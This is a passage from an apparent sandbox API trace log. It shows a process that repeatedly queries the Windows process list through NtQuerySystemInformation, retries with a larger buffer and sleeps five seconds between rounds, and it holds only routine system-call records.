RegionSize=0xdea54*=0x20000) returned 0x0 [0219.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.823] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.832] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.839] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.847] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.854] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.861] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.867] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.874] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.882] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.926] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.934] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.941] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.950] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.957] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.963] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.970] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.978] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.003] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.012] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.019] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.027] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.029] 